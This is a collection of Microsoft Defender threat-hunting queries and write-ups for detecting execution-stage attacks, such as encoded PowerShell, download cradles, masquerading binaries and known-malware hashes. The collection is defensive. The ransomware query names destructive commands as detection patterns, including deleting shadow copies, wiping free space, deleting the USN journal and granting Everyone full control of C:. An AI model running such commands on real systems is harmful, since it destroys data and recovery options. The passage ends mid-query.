Execution/Base64encodePEFile.txt ================================================ // Finding base64 encoded PE files header seen in the command line parameters // Tags: #fileLess #powershell DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine contains "TVqQAAMAAAAEAAA" | top 1000 by Timestamp ================================================ FILE: Execution/Detect Encoded Powershell.md ================================================ # Detect Encoded PowerShell This query will detect encoded powershell based on the parameters passed during process creation. This query will also work if the PowerShell executable is renamed or tampered with since detection is based solely on a regex of the launch string. ## Query ``` DeviceProcessEvents | where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})' | extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine))) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Execution/Detect PowerShell v2 Downgrade.md ================================================ # Detect PowerShell Downgrade This query looks for processes that load an older version of the system.management.automation libraries. While not inherently malicious, downgrading to PowerShell version 2 can enable an attacker to bypass some of the protections afforded by modern PowerShell. It is worth noting that some tools and scripts perform this to enable backwards compatibility, so the technique is not inherently malicious. You will likely need to filter the processes within your environment that legitimately use this capability for this to be effective. ## Query ``` DeviceImageLoadEvents | where InitiatingProcessFileName =~ 'powershell.exe' and FileName in~ ('system.management.automation.ni.dll','System.Management.Automation.dll') and FolderPath matches regex @"[12]\.(\d)+\.(\d)+\.(\d)+" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Execution/ExecuteBase64DecodedPayload.txt ================================================ // Process executed from binary hidden in Base64 encoded file. Encoding malicious software is a // technique to obfuscate files from detection. // The first and second ProcessCommandLine component is looking for Python decoding base64 // The third ProcesssCommandLine component is looking for the Bash/sh commandline base64 decoding tool // The fourth one is looking for Ruby decoding base64 DeviceProcessEvents | where Timestamp > ago(14d) | where ProcessCommandLine contains ".decode('base64')" or ProcessCommandLine contains ".b64decode(" or ProcessCommandLine contains "base64 --decode" or ProcessCommandLine contains ".decode64(" | project Timestamp , DeviceName , FileName , FolderPath , ProcessCommandLine , InitiatingProcessCommandLine | top 100 by Timestamp ================================================ FILE: Execution/File Copy and Execution.md ================================================ # File Copy and Execution This query identifies files that are copied to a device over SMB, then executed within a specified threshold. Default is 5 seconds, but is configurable by tweaking the value for ToleranceInSeconds. ## Query ``` let ToleranceInSeconds = 5; DeviceNetworkEvents | where LocalPort == 445 and isnotempty(RemoteIP) | join kind = inner DeviceLogonEvents on DeviceId | where Timestamp1 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp)) and RemoteIP endswith RemoteIP1 | join kind=inner ( DeviceFileEvents | where ActionType in ('FileModified','FileCreated') and (InitiatingProcessFileName =~ 'System' or InitiatingProcessFolderPath endswith "ntoskrnl.exe") ) on DeviceId | where Timestamp2 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp)) | join kind=inner DeviceProcessEvents on DeviceId, FolderPath | where Timestamp3 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp)) | project Timestamp, DeviceName, RemoteIP, RemotePort, AccountDomain, AccountName, AccountSid, Protocol, LogonId, RemoteDeviceName, IsLocalAdmin, FileName, FolderPath, SHA1, SHA256, MD5, ProcessCommandLine ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Execution/Malware_In_recyclebin.txt ================================================ // Finding attackers hiding malware in the recycle bin. // Read more here: https://azure.microsoft.com/en-us/blog/how-azure-security-center-helps-reveal-a-cyberattack/ // Tags: #execution #SuspiciousPath DeviceProcessEvents | where Timestamp > ago(7d) | where FileName in~('cmd.exe','ftp.exe','schtasks.exe','powershell.exe','rundll32.exe','regsvr32.exe','msiexec.exe') | where ProcessCommandLine contains ":\\recycler" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName ================================================ FILE: Execution/Masquerading system executable.txt ================================================ //Finds legitimate system32 or syswow64 executables being run under a different name and in a different location //The rule will require tuning for your environment //MITRE: Masquerading https://attack.mitre.org/techniques/T1036/ // //Get a list of all processes run, except those run from system32 or SysWOW64 let nonSystemProcesses = DeviceProcessEvents | where Timestamp > ago(7d) //Adjust your desired date range here and set the data/time picker to 30 days | where FolderPath !startswith @"C:\Windows\system32\" and FolderPath !startswith @"C:\Windows\SysWOW64\" and isnotempty(MD5) and FileName !in~ ("MpSigStub.exe","GACUtil_20.exe"); //Get a list of MD5s of all procceses run from system32 or SysWOW64 let systemProcessHashes = DeviceProcessEvents | where Timestamp > ago(30d) //Keep this at 30 days so it uses all available data to compile the list of hashes | where FolderPath startswith @"C:\Windows\system32\" or FolderPath startswith @"C:\Windows\SysWOW64\" and isnotempty(MD5) and FileName !in~ ("fileacl.exe","WerFault.exe") | summarize LegitFolderPath=makeset(tolower(FolderPath)) by MD5, LegitFileName=FileName; //Join the two tables on MD5, where the filenames do not match systemProcessHashes | join kind=inner (nonSystemProcesses) on MD5 | where tolower(LegitFileName)!=tolower(FileName) | project Timestamp, DeviceName, FileName, FolderPath, LegitFileName, LegitFolderPath, MD5, ProcessCommandLine, AccountName, InitiatingProcessFileName, InitiatingProcessParentFileName, ReportId, DeviceId | top 100 by Timestamp desc ================================================ FILE: Execution/Possible Ransomware Related Destruction Activity.md ================================================ # Possible Ransomware Related Destruction Activity This query identifies common processes run by ransomware malware to destroy volume shadow copies or clean free space on a drive to prevent a file from being recovered post-encryption. To reduce false positives, results are filtered to only actions taken when the initiating process was launched from a suspicious directory. If you don't mind false positives, consider removing the last where clause. Special thanks to Captain for additional inputs ## Query ``` DeviceProcessEvents | where Timestamp > ago(7d) | where (FileName =~ 'vssadmin.exe' and ProcessCommandLine has "delete shadows" and ProcessCommandLine has "/all" and ProcessCommandLine has "/quiet" ) // Clearing shadow copies or (FileName =~ 'cipher.exe' and ProcessCommandLine contains "/w") // Wiping drive free space or (FileName =~ 'schtasks.exe' and ProcessCommandLine has "/change" and ProcessCommandLine has @"\Microsoft\Windows\SystemRestore\SR" and ProcessCommandLine has "/disable") // Disabling system restore task or (FileName =~ 'fsutil.exe' and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal" and ProcessCommandLine has "/d") // Deleting USN journal or (FileName =~ 'icacls.exe' and ProcessCommandLine has @'"C:\*"' and ProcessCommandLine contains '/grant Everyone:F') // Attempts to re-ACL all files on the C drive to give everyone full control or (FileName =~ 'powershell.exe' and ( ProcessCommandLine matches regex @'\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s+' and replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine))) matches regex @".*(Win32_Shadowcopy).*(.Delete\(\)).*" ) or ProcessCommandLine matches regex @".*(Win32_Shadowcopy).*(.Delete\(\)).*" ) // This query looks for PowerShell-based commands used to delete shadow copies ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone, with special thanks to Captain and @kshitijk_ **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Execution/PowerShell downloads.txt ================================================ // Finds PowerShell execution events that could involve a download. DeviceProcessEvents | where Timestamp > ago(7d) | where FileName in~ ("powershell.exe", "powershell_ise.exe") | where ProcessCommandLine has "Net.WebClient" or ProcessCommandLine has "DownloadFile" or ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "Invoke-Shellcode" or ProcessCommandLine has "http" or ProcessCommandLine has "IEX" or ProcessCommandLine has "Start-BitsTransfer" or ProcessCommandLine has "mpcmdrun.exe" | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine | top 100 by Timestamp ================================================ FILE: Execution/PowershellCommand - uncommon commands on machine.txt ================================================ // Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period. // This covers all Powershell commands executed in the Powershell engine by any process. let DeviceId = "474908f457a1dc4c1fab568f808d5f77bf3bb951"; let timestamp = datetime(2018-06-09T02:23:26.6832917Z); // Query for Powershell cmdlets let powershellCommands = DeviceEvents | where ActionType == "PowerShellCommand" // Extract the powershell command name from the Command field in the AdditionalFields JSON column | project PowershellCommand=extractjson("$.Command", AdditionalFields, typeof(string)), InitiatingProcessCommandLine, InitiatingProcessParentFileName, Timestamp, DeviceId | where PowershellCommand !endswith ".ps1" and PowershellCommand !endswith ".exe"; // Filter Powershell cmdlets executed on relevant machine and time period powershellCommands | where DeviceId == DeviceId and Timestamp between ((timestamp-5min) .. 10min) // Filter out common powershell cmdlets | join kind=leftanti (powershellCommands | summarize MachineCount=dcount(DeviceId) by PowershellCommand | where MachineCount > 20) on PowershellCommand // To learn more about queries on Powershell commands, take a look this post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-PowerShell-commands/m-p/210898#M30 // Related queries: // 1. Found a suspicious command? Let's pivot to see on which other machines it was executed: // https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowershellCommand%20footprint.txt // 2. We know typing an exact timestamp could be annoying... // Why not query for the timestamp of the event you're looking for instead? // In example, when investigating at an alert, look for the powershell commands executed around the time of the first event detected in that alert. // https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/General%20queries/Events%20surrounding%20alert.txt ================================================ FILE: Execution/PowershellCommand footprint.txt ================================================ // Find all machines running a given Powersehll cmdlet. // This covers all Powershell commands executed in the Powershell engine by any process. let powershellCommandName = "Invoke-RickAscii"; DeviceEvents | where ActionType == "PowerShellCommand" // This filter improves query performance, as it avoids needing to parse Command from all rows and only then applying a filter | where AdditionalFields contains powershellCommandName // Extract the powershell command name from the Command field in the AdditionalFields JSON column | project PowershellCommand=extractjson("$.Command", AdditionalFields, typeof(string)), InitiatingProcessCommandLine, InitiatingProcessParentFileName, Timestamp, DeviceId // Do an exact case-insensitive match on the command name field | where PowershellCommand =~ powershellCommandName // To learn more about queries on Powershell commands, take a look this post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-PowerShell-commands/m-p/210898#M30 // Related query - find uncommon Powershell commands executed on a machine in a certain time-range: // https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowershellCommand%20-%20uncommon%20commands%20on%20machine.txt ================================================ FILE: Execution/Webserver Executing Suspicious Applications.md ================================================ # Webserver Executing Suspicious Applications This query looks for common webserver process names and identifies any processes launched using a scripting language (cmd, powershell, wscript, cscript), common initial profiling commands (net \ net1 \ whoami \ ping \ ipconfig),or admin commands (sc). Note that seeing thisactivity doesn't immediately mean you have a breach, though you might consider reviewing and honing the where clause to fit your specific web applications. Those who don't mind false positives should consider also adding database process names to this list as well (i.e. sqlservr.exe) to identify potential abuse of xp_cmdshell. ## Query ``` DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName in~ ('w3wp.exe', 'httpd.exe') // 'sqlservr.exe') | where FileName in~ ('cmd.exe', 'powershell.exe', 'cscript.exe', 'wscript.exe', 'net.exe', 'net1.exe', 'ping.exe', 'whoami.exe') | summarize instances = count() by ProcessCommandLine, FolderPath, DeviceName, DeviceId | order by instances asc ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Execution/check-for-shadowhammer-activity-implant.md ================================================ # Check for ShadowHammer-related implant or container activity This query was originally published in the threat analytics report, *ShadowHammer supply chain attack* [Operation ShadowHammer](https://www.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers) was an attack against ASUS computer hardware, using the company's own update infrastructure to deliver malware to the company's products. The campaign ran from June to November, 2018. ASUS has since [responded](https://www.asus.com/News/hqfgVUyZ6uyAyJe1) with updates that protect their Live Update system, and diagnostic tools to check affected systems. The following query checks for activity associated with the ShadowHammer implant or container over the past 30 days. ## Query ``` ​// Event types that may be associated with the implant or container union DeviceProcessEvents , DeviceNetworkEvents , DeviceFileEvents , DeviceImageLoadEvents | where Timestamp > ago(30d) // File SHAs for implant and container | where InitiatingProcessSHA1 in("e01c1047001206c52c87b8197d772db2a1d3b7b4", "e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-anomalous-process-trees.md ================================================ # Detect anomalous process trees This query generates process trees of given processes and performs anomaly detection on the process trees. It generates process trees up to 7th level. The query can be used as a template to perform anomaly detection on specific processes like winword.exe, powerpnt.exe, w3wp.exe, etc. The query runs without any performance issues in large environments. Detailed explanation can be found [here](https://mergene.medium.com/detecting-threats-with-process-tree-analysis-without-machine-learning-838d85f78b2c) ## Query ```Kusto let timeframe = 48h; // Define of which processes you want to generate process tree let _selected_processes = dynamic(["winword.exe","excel.exe","powerpnt.exe","acrord32.exe", "FoxitPhantomPDF.exe","MicrosoftPdfReader.exe","SumatraPDF.exe"]); // First, generate the process tree and store it in the cache. // Renaming fields accordingly to generate a tree up to 7th level // In each step, project only the required fields to optimize resource usage let _process_tree_data= materialize ( DeviceProcessEvents | where Timestamp > ago(timeframe) | where InitiatingProcessFileName in~ (_selected_processes ) | project DeviceId,DeviceName, InitiatingProcessG3ParentFileName=FileName,InitiatingProcessG3ParentSHA1=SHA1,InitiatingProcessG3ParentId=ProcessId, InitiatingProcessG3ParentCommandLine=ProcessCommandLine,InitiatingProcessG3ParentCreationTime=todatetime(ProcessCreationTime), InitiatingProcessG4ParentFileName=InitiatingProcessFileName,InitiatingProcessG4ParentSHA1=InitiatingProcessSHA1,InitiatingProcessG4ParentId=InitiatingProcessId,InitiatingProcessG4ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG4ParentCreationTime=todatetime(InitiatingProcessCreationTime) // Start iteration // 1st iteration of join. From now on, query all processes, rename fields, and join accordingly | join kind=leftouter ( DeviceProcessEvents | where Timestamp > ago(timeframe) | project DeviceId, InitiatingProcessG2ParentFileName=FileName,InitiatingProcessG2ParentFolderPath=FolderPath,InitiatingProcessG2ParentSHA1=SHA1, InitiatingProcessG2ParentId=ProcessId, InitiatingProcessG2ParentCommandLine=ProcessCommandLine, InitiatingProcessG2ParentCreationTime=todatetime(ProcessCreationTime), InitiatingProcessG3ParentFileName=InitiatingProcessFileName,InitiatingProcessG3ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG3ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG3ParentId=InitiatingProcessId, InitiatingProcessG3ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG3ParentCreationTime=todatetime(InitiatingProcessCreationTime) ) on DeviceId , InitiatingProcessG3ParentFileName, InitiatingProcessG3ParentId, InitiatingProcessG3ParentCreationTime // 2nd iteration of join. | join kind=leftouter ( DeviceProcessEvents | where Timestamp > ago(timeframe) | project DeviceId, InitiatingProcessG1ParentFileName=FileName,InitiatingProcessG1ParentFolderPath=FolderPath,InitiatingProcessG1ParentSHA1=SHA1, InitiatingProcessG1ParentId=ProcessId, InitiatingProcessG1ParentCommandLine=ProcessCommandLine, InitiatingProcessG1ParentCreationTime=todatetime(ProcessCreationTime), InitiatingProcessG2ParentFileName=InitiatingProcessFileName,InitiatingProcessG2ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG2ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG2ParentId=InitiatingProcessId, InitiatingProcessG2ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG2ParentCreationTime=todatetime(InitiatingProcessCreationTime) ) on DeviceId , InitiatingProcessG2ParentFileName , InitiatingProcessG2ParentId, InitiatingProcessG2ParentCreationTime // 3rd iteration of join. | join kind=leftouter ( DeviceProcessEvents | where Timestamp > ago(timeframe) | project DeviceId, InitiatingProcessParentFileName=FileName,InitiatingProcessParentFolderPath=FolderPath,InitiatingProcessParentSHA1=SHA1, InitiatingProcessParentId=ProcessId, InitiatingProcessParentCommandLine=ProcessCommandLine, InitiatingProcessParentCreationTime=ProcessCreationTime, InitiatingProcessG1ParentFileName=InitiatingProcessFileName,InitiatingProcessG1ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG1ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG1ParentId=InitiatingProcessId, InitiatingProcessG1ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG1ParentCreationTime=todatetime(InitiatingProcessCreationTime) ) on DeviceId , InitiatingProcessG1ParentFileName , InitiatingProcessG1ParentId, InitiatingProcessG1ParentCreationTime // 4th iteration of join | join kind=leftouter ( DeviceProcessEvents | where Timestamp > ago(timeframe) | project DeviceId, InitiatingProcessFileName=FileName,InitiatingProcessSHA1=SHA1, InitiatingProcessId=ProcessId, InitiatingProcessCommandLine=ProcessCommandLine, InitiatingProcessCreationTime=ProcessCreationTime, InitiatingProcessParentFileName=InitiatingProcessFileName,InitiatingProcessParentSHA1=InitiatingProcessSHA1, InitiatingProcessParentId=InitiatingProcessId, InitiatingProcessParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessParentCreationTime=InitiatingProcessCreationTime ) on DeviceId , InitiatingProcessParentFileName , InitiatingProcessParentId, InitiatingProcessParentCreationTime // 5th iteration of join | join kind=leftouter ( DeviceProcessEvents | where Timestamp > ago(timeframe) | project Timestamp, DeviceId, FileName,SHA1, ProcessId, ProcessCommandLine, ProcessCreationTime, InitiatingProcessFileName,InitiatingProcessSHA1, InitiatingProcessId, InitiatingProcessCommandLine, InitiatingProcessCreationTime ) on DeviceId , InitiatingProcessFileName , InitiatingProcessId, InitiatingProcessCreationTime ); // Use the cached results and find the rare patterns based on process names. _process_tree_data |summarize count() by FileName,InitiatingProcessFileName,InitiatingProcessParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG4ParentFileName | where count_ < 10 // If the count of a pattern is less than 10, it is anomalous. Threshold can be changed. // Now, join the anomalous patterns with the original results to get the details. | join kind=inner _process_tree_data on FileName,InitiatingProcessFileName,InitiatingProcessParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG4ParentFileName // Now, join the anomalous patterns with the original results to get the details. |project Timestamp=case(isnotempty(Timestamp),Timestamp,isnotempty(InitiatingProcessParentCreationTime),InitiatingProcessParentCreationTime,isnotempty(InitiatingProcessG1ParentCreationTime),InitiatingProcessG1ParentCreationTime, isnotempty(InitiatingProcessG2ParentCreationTime),InitiatingProcessG2ParentCreationTime,isnotempty(InitiatingProcessG3ParentCreationTime),InitiatingProcessG3ParentCreationTime,InitiatingProcessG4ParentCreationTime), count_ , DeviceId, DeviceName, InitiatingProcessG4ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessParentFileName,InitiatingProcessFileName,FileName, InitiatingProcessG4ParentCommandLine, InitiatingProcessG3ParentCommandLine, InitiatingProcessG2ParentCommandLine, InitiatingProcessG1ParentCommandLine, InitiatingProcessCommandLine, ProcessCommandLine, InitiatingProcessG4ParentId, InitiatingProcessG4ParentCreationTime, InitiatingProcessG3ParentId, InitiatingProcessG3ParentFolderPath ,InitiatingProcessG3ParentSHA1, InitiatingProcessG3ParentCreationTime, InitiatingProcessG2ParentId,InitiatingProcessG2ParentFolderPath,InitiatingProcessG2ParentSHA1, InitiatingProcessG2ParentCreationTime, InitiatingProcessG1ParentId,InitiatingProcessG1ParentFolderPath,InitiatingProcessG1ParentSHA1, InitiatingProcessG1ParentCreationTime, InitiatingProcessParentId, InitiatingProcessParentFolderPath,InitiatingProcessParentSHA1, InitiatingProcessParentCommandLine ,InitiatingProcessParentCreationTime, InitiatingProcessId, InitiatingProcessSHA1, InitiatingProcessCreationTime, ProcessId, SHA1, ProcessCreationTime | order by Timestamp, DeviceName, InitiatingProcessG4ParentCreationTime , InitiatingProcessG3ParentCreationTime , InitiatingProcessG2ParentCreationTime , InitiatingProcessG1ParentCreationTime , InitiatingProcessCreationTime ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | v | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Cyb3rMonk ([Medium](https://mergene.medium.com/), [GitHub](https://github.com/Cyb3r-Monk), [Twitter](https://twitter.com/Cyb3rMonk)) ================================================ FILE: Execution/detect-bluekeep-related-mining.md ================================================ # Detect BlueKeep-related cryptocurrency mining This query was originally published in the threat analytics report, *Exploitation of CVE-2019-0708 (BlueKeep)*. [CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708), also known as BlueKeep, is a critical remote code execution vulnerability involving RDP. Soon after its disclosure, the NSA issued a rare [advisory](https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/1865726/nsa-cybersecurity-advisory-patch-remote-desktop-services-on-legacy-versions-of/) about this vulnerability, out of concern that it could be used to quickly spread malware. Attackers have since used this vulnerability to [install cryptocurrency miners](https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/) on targets. Microsoft has issued [updates](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) for this vulnerability, as well as [guidance](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708) for protecting operating systems that we no longer support. Microsoft Defender ATP also contains [behavioral detections](https://www.microsoft.com/security/blog/2019/11/07/the-new-cve-2019-0708-rdp-exploit-attacks-explained/) for defending against this threat. The following query locates devices where the known coin miner payload was dropped. ## Query ```Kusto // Suggest setting Timestamp starting from September 6th // when the BlueKeep Metasploit module was released DeviceFileEvents | where Timestamp > ago(7d) | where FolderPath endswith "spool\\svchost.exe" or SHA1=="82288c2dc5c63c1c57170da91f9979648333658e" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect BlueKeep exploitation attempts](../Initial%20access/detect-bluekeep-exploitation-attempts.md) * [Detect suspicious RDP activity related to BlueKeep](..\Lateral%20Movement\detect-suspicious-rdp-connections.md) * [Detect command-and-control communication related to BlueKeep cryptomining](../Command%20and%20Control/c2-bluekeep.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-doublepulsar-execution.md ================================================ # Detect DoublePulsar execution This query was originally published in the threat analytics report, *Motivated miners*. [Doublepulsar](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoublePulsar&threatId=-2147239036) is a backdoor developed by the National Security Agency (NSA). First [disclosed in 2017](https://www.scmagazine.com/home/security-news/cybercrime/doublepulsar-malware-spreading-rapidly-in-the-wild-following-shadow-brokers-dump/), it is now used by many malicious actors. Software [patches](https://support.microsoft.com/en-us/help/4013389/title) are available. The following query detects possible DoublePulsar execution events. See [Detect web server exploitation by DoublePulsar](detect-web-server-exploit-doublepulsar.md) for a query that detects behaviors associated with campaigns that use DoublePulsar. ## Query ```Kusto //DoublePulsar execution DeviceProcessEvents | where Timestamp > ago(7d) | where SHA1 == "be855cd1bfc1e1446a3390c693f29e2a3007c04e" or (ProcessCommandLine contains "targetport" and ProcessCommandLine contains "targetip" and (ProcessCommandLine contains "payload" or ProcessCommandLine contains "verifybackdoor")) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-exploitation-of-cve-2018-8653.md ================================================ # Detect exploitation of the Internet Explorer remote code execution vulnerability, CVE-2018-8653 This query was originally published in the threat analytics report, *CVE-2018-8653 scripting engine vulnerability*. [CVE-2018-8653](https://nvd.nist.gov/vuln/detail/CVE-2018-8653) is a remote code execution vulnerability found in the scripting engine for several releases of Internet Explorer. An attacker exploiting this CVE could use a malicious webpage to gain the same access rights as the currently logged-in user -- which is particularly problematic if the user is an administrator. Microsoft has since [addressed](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653) this vulnerability. The following queries detect possible exploitation of this CVE. ## Query ```Kusto DeviceProcessEvents | where Timestamp > ago(7d) and InitiatingProcessFileName =~ "svchost.exe" and InitiatingProcessCommandLine contains "WinHttpAutoProxySvc" and FileName !~ "pacjsworker.exe" and FileName !~ "svchost.exe" and FileName !~ "WerFault.exe" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | v | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Execution/detect-malcious-use-of-msiexec.md ================================================ # Detect malicious use of Msiexec This query was originally published in the threat analytics report, *Msiexec abuse*. *[Msiexec.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/msiexec)* is a Windows component that installs files with the *.msi* extension. These kinds of files are Windows installer packages, and are used by a wide array of legitimate software. However, malicious actors can re-purpose msiexec.exe for living-off-the-land attacks, where they use legitimate system binaries on the compromised device to perform attacks. The following query detects activity associated with misuse of msiexec.exe, particularly alongside [mimikatz](https://www.varonis.com/blog/what-is-mimikatz/), a common credential dumper and privilege escalation tool. ## Query ```Kusto //Find possible download and execution using Msiexec DeviceProcessEvents | where Timestamp > ago(7d) //MSIExec | where FileName =~ "msiexec.exe" and //With domain in command line (ProcessCommandLine has "http" and ProcessCommandLine has "return")//Find PowerShell running files from the temp folder DeviceProcessEvents | where Timestamp > ago(7d) 